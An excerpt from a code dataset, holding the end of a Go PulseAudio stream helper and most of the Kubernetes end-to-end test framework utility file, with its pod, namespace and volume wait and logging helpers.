ba.fragsize = 0xffffffff
} else {
ba.maxlength = pbytes * 4
ba.tlength = 0xffffffff
ba.prebuf = 0xffffffff
ba.minreq = 0xffffffff
ba.fragsize = pbytes
}
var paServer *C.char
if *paServerFlag != "" {
paServer = C.CString(*paServerFlag)
defer C.free(unsafe.Pointer(paServer))
}
var paSink *C.char
if *paSinkFlag != "" {
paSink = C.CString(*paSinkFlag)
defer C.free(unsafe.Pointer(paSink))
}
paStreamName := C.CString(streamName)
defer C.free(unsafe.Pointer(paStreamName))
var paerr C.int
pa := C.pa_simple_new(paServer, paName, direction, paSink, paStreamName, &ss, nil, &ba, &paerr)
if pa == nil {
return nil, errors.New(C.GoString(C.pa_strerror(paerr)))
}
return pa, nil
}
func getPublicIP() (string, error) {
resp, err := http.Get("http://api.ipify.org")
if err != nil {
return "", err
}
defer resp.Body.Close()
body, err := ioutil.ReadAll(resp.Body)
if err != nil {
return "", err
}
return string(body), nil
} | [
"\"USER\""
] | [] | [
"USER"
] | [] | ["USER"] | go | 1 | 0 | |
test/e2e/framework/util.go | /*
Copyright 2014 The Kubernetes Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package framework
import (
"bytes"
"context"
"encoding/json"
"errors"
"fmt"
"io"
"io/ioutil"
"math/rand"
"net"
"net/http"
"net/url"
"os"
"os/exec"
"path"
"path/filepath"
"regexp"
goruntime "runtime"
"sort"
"strconv"
"strings"
"sync"
"syscall"
"text/tabwriter"
"time"
"github.com/golang/glog"
"golang.org/x/crypto/ssh"
"golang.org/x/net/websocket"
"google.golang.org/api/googleapi"
. "github.com/onsi/ginkgo"
. "github.com/onsi/gomega"
gomegatypes "github.com/onsi/gomega/types"
apierrs "k8s.io/apimachinery/pkg/api/errors"
metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
"k8s.io/apimachinery/pkg/apis/meta/v1/unstructured"
"k8s.io/apimachinery/pkg/fields"
"k8s.io/apimachinery/pkg/labels"
"k8s.io/apimachinery/pkg/runtime"
"k8s.io/apimachinery/pkg/runtime/schema"
"k8s.io/apimachinery/pkg/types"
"k8s.io/apimachinery/pkg/util/sets"
"k8s.io/apimachinery/pkg/util/uuid"
"k8s.io/apimachinery/pkg/util/wait"
"k8s.io/apimachinery/pkg/watch"
testutil "k8s.io/kubernetes/test/utils"
"k8s.io/client-go/discovery"
"k8s.io/client-go/dynamic"
restclient "k8s.io/client-go/rest"
"k8s.io/client-go/tools/clientcmd"
clientcmdapi "k8s.io/client-go/tools/clientcmd/api"
"k8s.io/kubernetes/pkg/api"
"k8s.io/kubernetes/pkg/api/v1"
v1helper "k8s.io/kubernetes/pkg/api/v1/helper"
nodeutil "k8s.io/kubernetes/pkg/api/v1/node"
podutil "k8s.io/kubernetes/pkg/api/v1/pod"
apps "k8s.io/kubernetes/pkg/apis/apps/v1beta1"
batchinternal "k8s.io/kubernetes/pkg/apis/batch"
batch "k8s.io/kubernetes/pkg/apis/batch/v1"
extensionsinternal "k8s.io/kubernetes/pkg/apis/extensions"
extensions "k8s.io/kubernetes/pkg/apis/extensions/v1beta1"
"k8s.io/kubernetes/pkg/client/clientset_generated/clientset"
"k8s.io/kubernetes/pkg/client/clientset_generated/internalclientset"
"k8s.io/kubernetes/pkg/client/conditions"
"k8s.io/kubernetes/pkg/cloudprovider/providers/azure"
gcecloud "k8s.io/kubernetes/pkg/cloudprovider/providers/gce"
"k8s.io/kubernetes/pkg/controller"
deploymentutil "k8s.io/kubernetes/pkg/controller/deployment/util"
nodectlr "k8s.io/kubernetes/pkg/controller/node"
"k8s.io/kubernetes/pkg/kubectl"
"k8s.io/kubernetes/pkg/kubelet/util/format"
"k8s.io/kubernetes/pkg/master/ports"
sshutil "k8s.io/kubernetes/pkg/ssh"
uexec "k8s.io/kubernetes/pkg/util/exec"
labelsutil "k8s.io/kubernetes/pkg/util/labels"
"k8s.io/kubernetes/pkg/util/system"
utilversion "k8s.io/kubernetes/pkg/util/version"
"k8s.io/kubernetes/plugin/pkg/scheduler/algorithm/predicates"
"k8s.io/kubernetes/plugin/pkg/scheduler/schedulercache"
testutils "k8s.io/kubernetes/test/utils"
)
const (
// How long to wait for the pod to be listable
PodListTimeout = time.Minute
// Initial pod start can be delayed O(minutes) by slow docker pulls
// TODO: Make this 30 seconds once #4566 is resolved.
PodStartTimeout = 5 * time.Minute
// If there are any orphaned namespaces to clean up, this test is running
	// on a long-lived cluster. A long wait here is preferable to spurious test
// failures caused by leaked resources from a previous test run.
NamespaceCleanupTimeout = 15 * time.Minute
// Some pods can take much longer to get ready due to volume attach/detach latency.
slowPodStartTimeout = 15 * time.Minute
// How long to wait for a service endpoint to be resolvable.
ServiceStartTimeout = 1 * time.Minute
// How often to Poll pods, nodes and claims.
Poll = 2 * time.Second
pollShortTimeout = 1 * time.Minute
pollLongTimeout = 5 * time.Minute
// service accounts are provisioned after namespace creation
// a service account is required to support pod creation in a namespace as part of admission control
ServiceAccountProvisionTimeout = 2 * time.Minute
// How long to try single API calls (like 'get' or 'list'). Used to prevent
// transient failures from failing tests.
// TODO: client should not apply this timeout to Watch calls. Increased from 30s until that is fixed.
SingleCallTimeout = 5 * time.Minute
// How long nodes have to be "ready" when a test begins. They should already
// be "ready" before the test starts, so this is small.
NodeReadyInitialTimeout = 20 * time.Second
// How long pods have to be "ready" when a test begins.
PodReadyBeforeTimeout = 5 * time.Minute
// How long pods have to become scheduled onto nodes
podScheduledBeforeTimeout = PodListTimeout + (20 * time.Second)
podRespondingTimeout = 15 * time.Minute
ServiceRespondingTimeout = 2 * time.Minute
EndpointRegisterTimeout = time.Minute
// How long claims have to become dynamically provisioned
ClaimProvisionTimeout = 5 * time.Minute
// When these values are updated, also update cmd/kubelet/app/options/options.go
currentPodInfraContainerImageName = "gcr.io/google_containers/pause"
currentPodInfraContainerImageVersion = "3.0"
// How long each node is given during a process that restarts all nodes
// before the test is considered failed. (Note that the total time to
// restart all nodes will be this number times the number of nodes.)
RestartPerNodeTimeout = 5 * time.Minute
// How often to Poll the statues of a restart.
RestartPoll = 20 * time.Second
// How long a node is allowed to become "Ready" after it is restarted before
// the test is considered failed.
RestartNodeReadyAgainTimeout = 5 * time.Minute
// How long a pod is allowed to become "running" and "ready" after a node
// restart before test is considered failed.
RestartPodReadyAgainTimeout = 5 * time.Minute
// Number of objects that gc can delete in a second.
	// GC issues 2 requests for a single delete.
gcThroughput = 10
// Minimal number of nodes for the cluster to be considered large.
largeClusterThreshold = 100
// TODO(justinsb): Avoid hardcoding this.
awsMasterIP = "172.20.0.9"
// Serve hostname image name
ServeHostnameImage = "gcr.io/google_containers/serve_hostname:v1.4"
// ssh port
sshPort = "22"
)
var (
// Label allocated to the image puller static pod that runs on each node
// before e2es.
ImagePullerLabels = map[string]string{"name": "e2e-image-puller"}
// For parsing Kubectl version for version-skewed testing.
gitVersionRegexp = regexp.MustCompile("GitVersion:\"(v.+?)\"")
// Slice of regexps for names of pods that have to be running to consider a Node "healthy"
requiredPerNodePods = []*regexp.Regexp{
regexp.MustCompile(".*kube-proxy.*"),
regexp.MustCompile(".*fluentd-elasticsearch.*"),
regexp.MustCompile(".*node-problem-detector.*"),
}
)
type Address struct {
internalIP string
externalIP string
hostname string
}
// GetServerArchitecture fetches the architecture of the cluster's apiserver.
func GetServerArchitecture(c clientset.Interface) string {
arch := ""
sVer, err := c.Discovery().ServerVersion()
if err != nil || sVer.Platform == "" {
// If we failed to get the server version for some reason, default to amd64.
arch = "amd64"
} else {
// Split the platform string into OS and Arch separately.
// The platform string may for example be "linux/amd64", "linux/arm" or "windows/amd64".
osArchArray := strings.Split(sVer.Platform, "/")
arch = osArchArray[1]
}
return arch
}
// GetPauseImageName fetches the pause image name for the same architecture as the apiserver.
func GetPauseImageName(c clientset.Interface) string {
return currentPodInfraContainerImageName + "-" + GetServerArchitecture(c) + ":" + currentPodInfraContainerImageVersion
}
// GetPauseImageNameForHostArch fetches the pause image name for the same architecture the test is running on.
// TODO: move this function to the test/utils
func GetPauseImageNameForHostArch() string {
return currentPodInfraContainerImageName + "-" + goruntime.GOARCH + ":" + currentPodInfraContainerImageVersion
}
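// Illustrative sketch, not part of the original file: on an amd64 host,
// GetPauseImageNameForHostArch() yields
// "gcr.io/google_containers/pause-amd64:3.0", while GetPauseImageName(c)
// substitutes the apiserver's architecture for the local one.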
// SubResource proxy should have been functional in v1.0.0, but SubResource
// proxy via tunneling is known to be broken in v1.0. See
// https://github.com/kubernetes/kubernetes/pull/15224#issuecomment-146769463
//
// TODO(ihmccreery): remove once we don't care about v1.0 anymore, (tentatively
// in v1.3).
var SubResourcePodProxyVersion = utilversion.MustParseSemantic("v1.1.0")
var SubResourceServiceAndNodeProxyVersion = utilversion.MustParseSemantic("v1.2.0")
func GetServicesProxyRequest(c clientset.Interface, request *restclient.Request) (*restclient.Request, error) {
subResourceProxyAvailable, err := ServerVersionGTE(SubResourceServiceAndNodeProxyVersion, c.Discovery())
if err != nil {
return nil, err
}
if subResourceProxyAvailable {
return request.Resource("services").SubResource("proxy"), nil
}
return request.Prefix("proxy").Resource("services"), nil
}
// unique identifier of the e2e run
var RunId = uuid.NewUUID()
type CreateTestingNSFn func(baseName string, c clientset.Interface, labels map[string]string) (*v1.Namespace, error)
type ContainerFailures struct {
status *v1.ContainerStateTerminated
Restarts int
}
func GetMasterHost() string {
masterUrl, err := url.Parse(TestContext.Host)
ExpectNoError(err)
return masterUrl.Host
}
func nowStamp() string {
return time.Now().Format(time.StampMilli)
}
func log(level string, format string, args ...interface{}) {
fmt.Fprintf(GinkgoWriter, nowStamp()+": "+level+": "+format+"\n", args...)
}
func Logf(format string, args ...interface{}) {
log("INFO", format, args...)
}
func Failf(format string, args ...interface{}) {
msg := fmt.Sprintf(format, args...)
log("INFO", msg)
Fail(nowStamp()+": "+msg, 1)
}
func Skipf(format string, args ...interface{}) {
msg := fmt.Sprintf(format, args...)
log("INFO", msg)
Skip(nowStamp() + ": " + msg)
}
func SkipUnlessNodeCountIsAtLeast(minNodeCount int) {
if TestContext.CloudConfig.NumNodes < minNodeCount {
Skipf("Requires at least %d nodes (not %d)", minNodeCount, TestContext.CloudConfig.NumNodes)
}
}
func SkipUnlessNodeCountIsAtMost(maxNodeCount int) {
if TestContext.CloudConfig.NumNodes > maxNodeCount {
Skipf("Requires at most %d nodes (not %d)", maxNodeCount, TestContext.CloudConfig.NumNodes)
}
}
func SkipUnlessAtLeast(value int, minValue int, message string) {
if value < minValue {
Skipf(message)
}
}
func SkipIfProviderIs(unsupportedProviders ...string) {
if ProviderIs(unsupportedProviders...) {
Skipf("Not supported for providers %v (found %s)", unsupportedProviders, TestContext.Provider)
}
}
func SkipUnlessSSHKeyPresent() {
if _, err := GetSigner(TestContext.Provider); err != nil {
Skipf("No SSH Key for provider %s: '%v'", TestContext.Provider, err)
}
}
func SkipUnlessProviderIs(supportedProviders ...string) {
if !ProviderIs(supportedProviders...) {
Skipf("Only supported for providers %v (not %s)", supportedProviders, TestContext.Provider)
}
}
func SkipUnlessNodeOSDistroIs(supportedNodeOsDistros ...string) {
if !NodeOSDistroIs(supportedNodeOsDistros...) {
Skipf("Only supported for node OS distro %v (not %s)", supportedNodeOsDistros, TestContext.NodeOSDistro)
}
}
func SkipIfContainerRuntimeIs(runtimes ...string) {
for _, runtime := range runtimes {
if runtime == TestContext.ContainerRuntime {
Skipf("Not supported under container runtime %s", runtime)
}
}
}
func ProviderIs(providers ...string) bool {
for _, provider := range providers {
if strings.ToLower(provider) == strings.ToLower(TestContext.Provider) {
return true
}
}
return false
}
func NodeOSDistroIs(supportedNodeOsDistros ...string) bool {
for _, distro := range supportedNodeOsDistros {
if strings.ToLower(distro) == strings.ToLower(TestContext.NodeOSDistro) {
return true
}
}
return false
}
func ProxyMode(f *Framework) (string, error) {
pod := &v1.Pod{
ObjectMeta: metav1.ObjectMeta{
Name: "kube-proxy-mode-detector",
Namespace: f.Namespace.Name,
},
Spec: v1.PodSpec{
HostNetwork: true,
Containers: []v1.Container{
{
Name: "detector",
Image: "gcr.io/google_containers/e2e-net-amd64:1.0",
Command: []string{"/bin/sleep", "3600"},
},
},
},
}
f.PodClient().CreateSync(pod)
defer f.PodClient().DeleteSync(pod.Name, &metav1.DeleteOptions{}, DefaultPodDeletionTimeout)
cmd := "curl -q -s --connect-timeout 1 http://localhost:10249/proxyMode"
stdout, err := RunHostCmd(pod.Namespace, pod.Name, cmd)
if err != nil {
return "", err
}
Logf("ProxyMode: %s", stdout)
return stdout, nil
}
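// Illustrative usage sketch, not part of the original file; the mode string
// checked for is an assumption for the example only:
//
//	if mode, err := ProxyMode(f); err == nil && !strings.Contains(mode, "iptables") {
//		Skipf("test requires kube-proxy in iptables mode, found %q", mode)
//	}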
func SkipUnlessServerVersionGTE(v *utilversion.Version, c discovery.ServerVersionInterface) {
gte, err := ServerVersionGTE(v, c)
if err != nil {
Failf("Failed to get server version: %v", err)
}
if !gte {
Skipf("Not supported for server versions before %q", v)
}
}
func SkipIfMissingResource(clientPool dynamic.ClientPool, gvr schema.GroupVersionResource, namespace string) {
dynamicClient, err := clientPool.ClientForGroupVersionResource(gvr)
if err != nil {
Failf("Unexpected error getting dynamic client for %v: %v", gvr.GroupVersion(), err)
}
apiResource := metav1.APIResource{Name: gvr.Resource, Namespaced: true}
_, err = dynamicClient.Resource(&apiResource, namespace).List(metav1.ListOptions{})
if err != nil {
// not all resources support list, so we ignore those
if apierrs.IsMethodNotSupported(err) || apierrs.IsNotFound(err) || apierrs.IsForbidden(err) {
Skipf("Could not find %s resource, skipping test: %#v", gvr, err)
}
Failf("Unexpected error getting %v: %v", gvr, err)
}
}
// ProvidersWithSSH are those providers where each node is accessible with SSH
var ProvidersWithSSH = []string{"gce", "gke", "aws", "local"}
type podCondition func(pod *v1.Pod) (bool, error)
// logPodStates logs basic info of provided pods for debugging.
func logPodStates(pods []v1.Pod) {
// Find maximum widths for pod, node, and phase strings for column printing.
maxPodW, maxNodeW, maxPhaseW, maxGraceW := len("POD"), len("NODE"), len("PHASE"), len("GRACE")
for i := range pods {
pod := &pods[i]
if len(pod.ObjectMeta.Name) > maxPodW {
maxPodW = len(pod.ObjectMeta.Name)
}
if len(pod.Spec.NodeName) > maxNodeW {
maxNodeW = len(pod.Spec.NodeName)
}
if len(pod.Status.Phase) > maxPhaseW {
maxPhaseW = len(pod.Status.Phase)
}
}
// Increase widths by one to separate by a single space.
maxPodW++
maxNodeW++
maxPhaseW++
maxGraceW++
// Log pod info. * does space padding, - makes them left-aligned.
Logf("%-[1]*[2]s %-[3]*[4]s %-[5]*[6]s %-[7]*[8]s %[9]s",
maxPodW, "POD", maxNodeW, "NODE", maxPhaseW, "PHASE", maxGraceW, "GRACE", "CONDITIONS")
for _, pod := range pods {
grace := ""
if pod.DeletionGracePeriodSeconds != nil {
grace = fmt.Sprintf("%ds", *pod.DeletionGracePeriodSeconds)
}
Logf("%-[1]*[2]s %-[3]*[4]s %-[5]*[6]s %-[7]*[8]s %[9]s",
maxPodW, pod.ObjectMeta.Name, maxNodeW, pod.Spec.NodeName, maxPhaseW, pod.Status.Phase, maxGraceW, grace, pod.Status.Conditions)
}
Logf("") // Final empty line helps for readability.
}
// errorBadPodsStates create error message of basic info of bad pods for debugging.
func errorBadPodsStates(badPods []v1.Pod, desiredPods int, ns, desiredState string, timeout time.Duration) string {
errStr := fmt.Sprintf("%d / %d pods in namespace %q are NOT in %s state in %v\n", len(badPods), desiredPods, ns, desiredState, timeout)
// Pirnt bad pods info only if there are fewer than 10 bad pods
if len(badPods) > 10 {
return errStr + "There are too many bad pods. Please check log for details."
}
buf := bytes.NewBuffer(nil)
w := tabwriter.NewWriter(buf, 0, 0, 1, ' ', 0)
fmt.Fprintln(w, "POD\tNODE\tPHASE\tGRACE\tCONDITIONS")
for _, badPod := range badPods {
grace := ""
if badPod.DeletionGracePeriodSeconds != nil {
grace = fmt.Sprintf("%ds", *badPod.DeletionGracePeriodSeconds)
}
podInfo := fmt.Sprintf("%s\t%s\t%s\t%s\t%s",
badPod.ObjectMeta.Name, badPod.Spec.NodeName, badPod.Status.Phase, grace, badPod.Status.Conditions)
fmt.Fprintln(w, podInfo)
}
w.Flush()
return errStr + buf.String()
}
// WaitForPodsSuccess waits till all labels matching the given selector enter
// the Success state. The caller is expected to only invoke this method once the
// pods have been created.
func WaitForPodsSuccess(c clientset.Interface, ns string, successPodLabels map[string]string, timeout time.Duration) error {
successPodSelector := labels.SelectorFromSet(successPodLabels)
start, badPods, desiredPods := time.Now(), []v1.Pod{}, 0
if wait.PollImmediate(30*time.Second, timeout, func() (bool, error) {
podList, err := c.Core().Pods(ns).List(metav1.ListOptions{LabelSelector: successPodSelector.String()})
if err != nil {
Logf("Error getting pods in namespace %q: %v", ns, err)
return false, nil
}
if len(podList.Items) == 0 {
Logf("Waiting for pods to enter Success, but no pods in %q match label %v", ns, successPodLabels)
return true, nil
}
badPods = []v1.Pod{}
desiredPods = len(podList.Items)
for _, pod := range podList.Items {
if pod.Status.Phase != v1.PodSucceeded {
badPods = append(badPods, pod)
}
}
successPods := len(podList.Items) - len(badPods)
Logf("%d / %d pods in namespace %q are in Success state (%d seconds elapsed)",
successPods, len(podList.Items), ns, int(time.Since(start).Seconds()))
if len(badPods) == 0 {
return true, nil
}
return false, nil
}) != nil {
logPodStates(badPods)
LogPodsWithLabels(c, ns, successPodLabels, Logf)
return errors.New(errorBadPodsStates(badPods, desiredPods, ns, "SUCCESS", timeout))
}
return nil
}
// WaitForPodsRunningReady waits up to timeout to ensure that all pods in
// namespace ns are either running and ready, or failed but controlled by a
// controller. Also, it ensures that at least minPods are running and
// ready. It has separate behavior from other 'wait for' pods functions in
// that it requests the list of pods on every iteration. This is useful, for
// example, in cluster startup, because the number of pods increases while
// waiting. All pods that are in SUCCESS state are not counted.
//
// If ignoreLabels is not empty, pods matching this selector are ignored.
func WaitForPodsRunningReady(c clientset.Interface, ns string, minPods, allowedNotReadyPods int32, timeout time.Duration, ignoreLabels map[string]string) error {
ignoreSelector := labels.SelectorFromSet(ignoreLabels)
start := time.Now()
Logf("Waiting up to %v for all pods (need at least %d) in namespace '%s' to be running and ready",
timeout, minPods, ns)
wg := sync.WaitGroup{}
wg.Add(1)
var ignoreNotReady bool
badPods := []v1.Pod{}
desiredPods := 0
if wait.PollImmediate(Poll, timeout, func() (bool, error) {
// We get the new list of pods, replication controllers, and
// replica sets in every iteration because more pods come
// online during startup and we want to ensure they are also
// checked.
replicas, replicaOk := int32(0), int32(0)
rcList, err := c.Core().ReplicationControllers(ns).List(metav1.ListOptions{})
if err != nil {
Logf("Error getting replication controllers in namespace '%s': %v", ns, err)
return false, nil
}
for _, rc := range rcList.Items {
replicas += *rc.Spec.Replicas
replicaOk += rc.Status.ReadyReplicas
}
rsList, err := c.Extensions().ReplicaSets(ns).List(metav1.ListOptions{})
if err != nil {
Logf("Error getting replication sets in namespace %q: %v", ns, err)
return false, nil
}
for _, rs := range rsList.Items {
replicas += *rs.Spec.Replicas
replicaOk += rs.Status.ReadyReplicas
}
podList, err := c.Core().Pods(ns).List(metav1.ListOptions{})
if err != nil {
Logf("Error getting pods in namespace '%s': %v", ns, err)
return false, nil
}
nOk := int32(0)
notReady := int32(0)
badPods = []v1.Pod{}
desiredPods = len(podList.Items)
for _, pod := range podList.Items {
if len(ignoreLabels) != 0 && ignoreSelector.Matches(labels.Set(pod.Labels)) {
continue
}
res, err := testutils.PodRunningReady(&pod)
			switch {
			case res && err == nil:
				nOk++
			case pod.Status.Phase == v1.PodSucceeded:
				// Succeeded pods are deliberately not counted; see the
				// function comment above.
				continue
case pod.Status.Phase != v1.PodFailed:
Logf("The status of Pod %s is %s (Ready = false), waiting for it to be either Running (with Ready = true) or Failed", pod.ObjectMeta.Name, pod.Status.Phase)
notReady++
badPods = append(badPods, pod)
default:
if _, ok := pod.Annotations[v1.CreatedByAnnotation]; !ok {
Logf("Pod %s is Failed, but it's not controlled by a controller", pod.ObjectMeta.Name)
badPods = append(badPods, pod)
}
//ignore failed pods that are controlled by some controller
}
}
Logf("%d / %d pods in namespace '%s' are running and ready (%d seconds elapsed)",
nOk, len(podList.Items), ns, int(time.Since(start).Seconds()))
Logf("expected %d pod replicas in namespace '%s', %d are Running and Ready.", replicas, ns, replicaOk)
if replicaOk == replicas && nOk >= minPods && len(badPods) == 0 {
return true, nil
}
ignoreNotReady = (notReady <= allowedNotReadyPods)
logPodStates(badPods)
return false, nil
}) != nil {
if !ignoreNotReady {
return errors.New(errorBadPodsStates(badPods, desiredPods, ns, "RUNNING and READY", timeout))
}
Logf("Number of not-ready pods is allowed.")
}
return nil
}
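// Illustrative usage sketch, not part of the original file; the namespace,
// pod counts, and timeout are assumptions for the example only:
//
//	err := WaitForPodsRunningReady(c, metav1.NamespaceSystem, 8, 0, 10*time.Minute, ImagePullerLabels)
//	if err != nil {
//		Failf("kube-system pods never became ready: %v", err)
//	}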
func kubectlLogPod(c clientset.Interface, pod v1.Pod, containerNameSubstr string, logFunc func(ftm string, args ...interface{})) {
for _, container := range pod.Spec.Containers {
if strings.Contains(container.Name, containerNameSubstr) {
// Contains() matches all strings if substr is empty
logs, err := GetPodLogs(c, pod.Namespace, pod.Name, container.Name)
if err != nil {
logs, err = getPreviousPodLogs(c, pod.Namespace, pod.Name, container.Name)
if err != nil {
logFunc("Failed to get logs of pod %v, container %v, err: %v", pod.Name, container.Name, err)
}
}
logFunc("Logs of %v/%v:%v on node %v", pod.Namespace, pod.Name, container.Name, pod.Spec.NodeName)
logFunc("%s : STARTLOG\n%s\nENDLOG for container %v:%v:%v", containerNameSubstr, logs, pod.Namespace, pod.Name, container.Name)
}
}
}
func LogFailedContainers(c clientset.Interface, ns string, logFunc func(ftm string, args ...interface{})) {
podList, err := c.Core().Pods(ns).List(metav1.ListOptions{})
if err != nil {
logFunc("Error getting pods in namespace '%s': %v", ns, err)
return
}
logFunc("Running kubectl logs on non-ready containers in %v", ns)
for _, pod := range podList.Items {
if res, err := testutils.PodRunningReady(&pod); !res || err != nil {
kubectlLogPod(c, pod, "", Logf)
}
}
}
func LogPodsWithLabels(c clientset.Interface, ns string, match map[string]string, logFunc func(ftm string, args ...interface{})) {
podList, err := c.Core().Pods(ns).List(metav1.ListOptions{LabelSelector: labels.SelectorFromSet(match).String()})
if err != nil {
logFunc("Error getting pods in namespace %q: %v", ns, err)
return
}
logFunc("Running kubectl logs on pods with labels %v in %v", match, ns)
for _, pod := range podList.Items {
kubectlLogPod(c, pod, "", logFunc)
}
}
func LogContainersInPodsWithLabels(c clientset.Interface, ns string, match map[string]string, containerSubstr string, logFunc func(ftm string, args ...interface{})) {
podList, err := c.Core().Pods(ns).List(metav1.ListOptions{LabelSelector: labels.SelectorFromSet(match).String()})
if err != nil {
Logf("Error getting pods in namespace %q: %v", ns, err)
return
}
for _, pod := range podList.Items {
kubectlLogPod(c, pod, containerSubstr, logFunc)
}
}
// DeleteNamespaces deletes all namespaces that match the given delete and skip filters.
// Filter is by simple strings.Contains; first skip filter, then delete filter.
// Returns the list of deleted namespaces or an error.
func DeleteNamespaces(c clientset.Interface, deleteFilter, skipFilter []string) ([]string, error) {
By("Deleting namespaces")
nsList, err := c.Core().Namespaces().List(metav1.ListOptions{})
Expect(err).NotTo(HaveOccurred())
var deleted []string
var wg sync.WaitGroup
OUTER:
for _, item := range nsList.Items {
if skipFilter != nil {
for _, pattern := range skipFilter {
if strings.Contains(item.Name, pattern) {
continue OUTER
}
}
}
if deleteFilter != nil {
var shouldDelete bool
for _, pattern := range deleteFilter {
if strings.Contains(item.Name, pattern) {
shouldDelete = true
break
}
}
if !shouldDelete {
continue OUTER
}
}
wg.Add(1)
deleted = append(deleted, item.Name)
go func(nsName string) {
defer wg.Done()
defer GinkgoRecover()
Expect(c.Core().Namespaces().Delete(nsName, nil)).To(Succeed())
Logf("namespace : %v api call to delete is complete ", nsName)
}(item.Name)
}
wg.Wait()
return deleted, nil
}
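// Illustrative usage sketch, not part of the original file; the filter
// patterns are assumptions for the example only. Namespaces matching the
// skip filter are always kept, then the delete filter selects what goes:
//
//	deleted, err := DeleteNamespaces(c, []string{"e2e-tests-"}, []string{"kube-system", "default"})
//	if err == nil {
//		ExpectNoError(WaitForNamespacesDeleted(c, deleted, NamespaceCleanupTimeout))
//	}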
func WaitForNamespacesDeleted(c clientset.Interface, namespaces []string, timeout time.Duration) error {
By("Waiting for namespaces to vanish")
nsMap := map[string]bool{}
for _, ns := range namespaces {
nsMap[ns] = true
}
//Now POLL until all namespaces have been eradicated.
return wait.Poll(2*time.Second, timeout,
func() (bool, error) {
nsList, err := c.Core().Namespaces().List(metav1.ListOptions{})
if err != nil {
return false, err
}
for _, item := range nsList.Items {
if _, ok := nsMap[item.Name]; ok {
return false, nil
}
}
return true, nil
})
}
func waitForServiceAccountInNamespace(c clientset.Interface, ns, serviceAccountName string, timeout time.Duration) error {
w, err := c.Core().ServiceAccounts(ns).Watch(metav1.SingleObject(metav1.ObjectMeta{Name: serviceAccountName}))
if err != nil {
return err
}
_, err = watch.Until(timeout, w, conditions.ServiceAccountHasSecrets)
return err
}
func WaitForPodCondition(c clientset.Interface, ns, podName, desc string, timeout time.Duration, condition podCondition) error {
Logf("Waiting up to %[1]v for pod %[2]s status to be %[3]s", timeout, podName, desc)
for start := time.Now(); time.Since(start) < timeout; time.Sleep(Poll) {
pod, err := c.Core().Pods(ns).Get(podName, metav1.GetOptions{})
if err != nil {
if apierrs.IsNotFound(err) {
Logf("Pod %q in namespace %q disappeared. Error: %v", podName, ns, err)
return err
}
// Aligning this text makes it much more readable
Logf("Get pod %[1]s in namespace '%[2]s' failed, ignoring for %[3]v. Error: %[4]v",
podName, ns, Poll, err)
continue
}
done, err := condition(pod)
if done {
return err
}
Logf("Waiting for pod %[1]s in namespace '%[2]s' status to be '%[3]s'"+
"(found phase: %[4]q, readiness: %[5]t) (%[6]v elapsed)",
podName, ns, desc, pod.Status.Phase, testutils.PodReady(pod), time.Since(start))
}
return fmt.Errorf("gave up waiting for pod '%s' to be '%s' after %v", podName, desc, timeout)
}
// WaitForMatchPodsCondition finds match pods based on the input ListOptions.
// waits and checks if all match pods are in the given podCondition
func WaitForMatchPodsCondition(c clientset.Interface, opts metav1.ListOptions, desc string, timeout time.Duration, condition podCondition) error {
Logf("Waiting up to %v for matching pods' status to be %s", timeout, desc)
for start := time.Now(); time.Since(start) < timeout; time.Sleep(Poll) {
pods, err := c.Core().Pods(metav1.NamespaceAll).List(opts)
if err != nil {
return err
}
conditionNotMatch := []string{}
for _, pod := range pods.Items {
done, err := condition(&pod)
if done && err != nil {
return fmt.Errorf("Unexpected error: %v", err)
}
if !done {
conditionNotMatch = append(conditionNotMatch, format.Pod(&pod))
}
}
		if len(conditionNotMatch) == 0 {
return err
}
Logf("%d pods are not %s: %v", len(conditionNotMatch), desc, conditionNotMatch)
}
return fmt.Errorf("gave up waiting for matching pods to be '%s' after %v", desc, timeout)
}
// WaitForDefaultServiceAccountInNamespace waits for the default service account to be provisioned
// the default service account is what is associated with pods when they do not specify a service account
// as a result, pods are not able to be provisioned in a namespace until the service account is provisioned
func WaitForDefaultServiceAccountInNamespace(c clientset.Interface, namespace string) error {
return waitForServiceAccountInNamespace(c, namespace, "default", ServiceAccountProvisionTimeout)
}
// WaitForPersistentVolumePhase waits for a PersistentVolume to be in a specific phase or until timeout occurs, whichever comes first.
func WaitForPersistentVolumePhase(phase v1.PersistentVolumePhase, c clientset.Interface, pvName string, Poll, timeout time.Duration) error {
Logf("Waiting up to %v for PersistentVolume %s to have phase %s", timeout, pvName, phase)
for start := time.Now(); time.Since(start) < timeout; time.Sleep(Poll) {
pv, err := c.Core().PersistentVolumes().Get(pvName, metav1.GetOptions{})
if err != nil {
Logf("Get persistent volume %s in failed, ignoring for %v: %v", pvName, Poll, err)
continue
} else {
if pv.Status.Phase == phase {
Logf("PersistentVolume %s found and phase=%s (%v)", pvName, phase, time.Since(start))
return nil
} else {
Logf("PersistentVolume %s found but phase is %s instead of %s.", pvName, pv.Status.Phase, phase)
}
}
}
return fmt.Errorf("PersistentVolume %s not in phase %s within %v", pvName, phase, timeout)
}
// WaitForPersistentVolumeDeleted waits for a PersistentVolume to get deleted or until timeout occurs, whichever comes first.
func WaitForPersistentVolumeDeleted(c clientset.Interface, pvName string, Poll, timeout time.Duration) error {
Logf("Waiting up to %v for PersistentVolume %s to get deleted", timeout, pvName)
for start := time.Now(); time.Since(start) < timeout; time.Sleep(Poll) {
pv, err := c.Core().PersistentVolumes().Get(pvName, metav1.GetOptions{})
if err == nil {
Logf("PersistentVolume %s found and phase=%s (%v)", pvName, pv.Status.Phase, time.Since(start))
continue
} else {
if apierrs.IsNotFound(err) {
Logf("PersistentVolume %s was removed", pvName)
return nil
} else {
Logf("Get persistent volume %s in failed, ignoring for %v: %v", pvName, Poll, err)
}
}
}
return fmt.Errorf("PersistentVolume %s still exists within %v", pvName, timeout)
}
// WaitForPersistentVolumeClaimPhase waits for a PersistentVolumeClaim to be in a specific phase or until timeout occurs, whichever comes first.
func WaitForPersistentVolumeClaimPhase(phase v1.PersistentVolumeClaimPhase, c clientset.Interface, ns string, pvcName string, Poll, timeout time.Duration) error {
Logf("Waiting up to %v for PersistentVolumeClaim %s to have phase %s", timeout, pvcName, phase)
for start := time.Now(); time.Since(start) < timeout; time.Sleep(Poll) {
